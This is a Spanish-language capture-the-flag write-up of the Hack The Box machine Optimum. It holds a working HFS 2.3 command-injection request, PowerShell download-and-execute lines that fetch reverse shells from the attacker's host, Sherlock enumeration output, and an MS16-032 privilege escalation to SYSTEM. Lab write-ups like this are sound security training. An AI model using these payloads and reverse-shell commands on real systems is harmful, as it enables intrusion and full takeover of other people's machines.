Esta maquina funciona con Windows. Hay que tener mucho cuidado con el encoding. No me estaba funcionando por eso.
Como siempre empezamos con un Nmap
root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.8 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-02 19:42 CET Nmap scan report for 10.10.10.8 Host is up (0.024s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Vemos que esta corriendo HttpFileServer httpd 2.3. Buscando en google vemos que tiene una vulnerabilidad en el search usando null byte. Por lo que si hacemos
GET /?search=%2500{.exec|ping+10.10.14.6} HTTP/1.1
Recibimos un ping
root@Kali2:~/Desktop# tcpdump -i tun0 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 19:55:00.648169 IP Kali2.55208 > 10.10.10.8.http: Flags [S], seq 311197498, win 29200, options [mss 1460,sackOK,TS val 2554504713 ecr 0,nop,wscale 7], length 0 19:55:00.672238 IP 10.10.10.8.http > Kali2.55208: Flags [S.], seq 565428027, ack 311197499, win 8192, options [mss 1357,nop,wscale 8,sackOK,TS val 83371 ecr 2554504713], length 0
Podemos ejecutar un powershell comand (tiene que ir URL encoded) para ejecutar una reverse shell de nishang
GET /?search=%00{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6:8000/powershellreverse2.ps1').} HTTP/1.1 Host: 10.10.10.8
Y eso nos da una shell
root@Kali2:~/Desktop# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49162 Windows PowerShell running as user kostas on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Users\kostas\Desktop>whoami Optimum\kostas PS C:\Users\kostas\Desktop> systeminfo Host Name: OPTIMUM OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA535 Original Install Date: 18/3/2017, 1:51:36 ?? System Boot Time: 9/11/2019, 6:58:56 ?? System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest Total Physical Memory: 4.095 MB Available Physical Memory: 3.275 MB Virtual Memory: Max Size: 5.503 MB Virtual Memory: Available: 4.706 MB Virtual Memory: In Use: 797 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): 31 Hotfix(s) Installed. [01]: KB2959936 [02]: KB2896496 [03]: KB2919355 [04]: KB2920189 [05]: KB2928120 [06]: KB2931358 [07]: KB2931366 [08]: KB2933826 [09]: KB2938772 [10]: KB2949621 [11]: KB2954879 [12]: KB2958262 [13]: KB2958263 [14]: KB2961072 [15]: KB2965500 [16]: KB2966407 [17]: KB2967917 [18]: KB2971203 [19]: KB2971850 [20]: KB2973351 [21]: KB2973448 [22]: KB2975061 [23]: KB2976627 [24]: KB2977629 [25]: KB2981580 [26]: KB2987107 [27]: KB2989647 [28]: KB2998527 [29]: KB3000850 [30]: KB3003057 [31]: KB3014442 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.8 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Despues de eso podemos usar sherlock
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/SherlockAllchecks.ps1') Title : User Mode to Ring (KiTrap0D) MSBulletin : MS10-015 CVEID : 2010-0232 Link : https://www.exploit-db.com/exploits/11199/ VulnStatus : Not supported on 64-bit systems Title : Task Scheduler .XML MSBulletin : MS10-092 CVEID : 2010-3338, 2010-3888 Link : https://www.exploit-db.com/exploits/19930/ VulnStatus : Not Vulnerable Title : NTUserMessageCall Win32k Kernel Pool Overflow MSBulletin : MS13-053 CVEID : 2013-1300 Link : https://www.exploit-db.com/exploits/33213/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenuEx Win32k NULL Page MSBulletin : MS13-081 CVEID : 2013-3881 Link : https://www.exploit-db.com/exploits/31576/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenu Win32k Null Pointer Dereference MSBulletin : MS14-058 CVEID : 2014-4113 Link : https://www.exploit-db.com/exploits/35101/ VulnStatus : Not Vulnerable Title : ClientCopyImage Win32k MSBulletin : MS15-051 CVEID : 2015-1701, 2015-2433 Link : https://www.exploit-db.com/exploits/37367/ VulnStatus : Not Vulnerable Title : Font Driver Buffer Overflow MSBulletin : MS15-078 CVEID : 2015-2426, 2015-2433 Link : https://www.exploit-db.com/exploits/38222/ VulnStatus : Not Vulnerable Title : 'mrxdav.sys' WebDAV MSBulletin : MS16-016 CVEID : 2016-0051 Link : https://www.exploit-db.com/exploits/40085/ VulnStatus : Not supported on 64-bit systems Title : Secondary Logon Handle MSBulletin : MS16-032 CVEID : 2016-0099 Link : https://www.exploit-db.com/exploits/39719/ VulnStatus : Appears Vulnerable Title : Windows Kernel-Mode Drivers EoP MSBulletin : MS16-034 CVEID : 2016-0093/94/95/96 Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1 6-034? VulnStatus : Appears Vulnerable Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255 Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S ample-Exploits/MS16-135 VulnStatus : Appears Vulnerable Title : Nessus Agent 6.6.2 - 6.10.3 MSBulletin : N/A CVEID : 2017-7199 Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h tml VulnStatus : Not Vulnerable
Sherlock nos muestra vulnerabilidades que pueden ser explotadas con Empire.
Bajamos el exploit de
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1
y le añadimos esta linea (para ejecutar otra shell de nishang)
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.9:8001/powershellreverse3.ps1')"
PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8001/MS16032.ps1') __ __ ___ ___ ___ ___ ___ ___ | V | _|_ | | _|___| |_ |_ | | |_ |_| |_| . |___| | |_ | _| |_|_|_|___|_____|___| |___|___|___| [by b33f -> @FuzzySec] [!] Holy handle leak Batman, we have a SYSTEM shell!!
Si escuchamos con NC
root@Kali2:~/Desktop# nc -nlvp 668 listening on [any] 668 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.8] 49173 Windows PowerShell running as user OPTIMUM$ on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Users\kostas\Desktop>whoami nt authority\system
Listo. La primera vez fue con metasploit esta fue sin tanta ayuda 🙂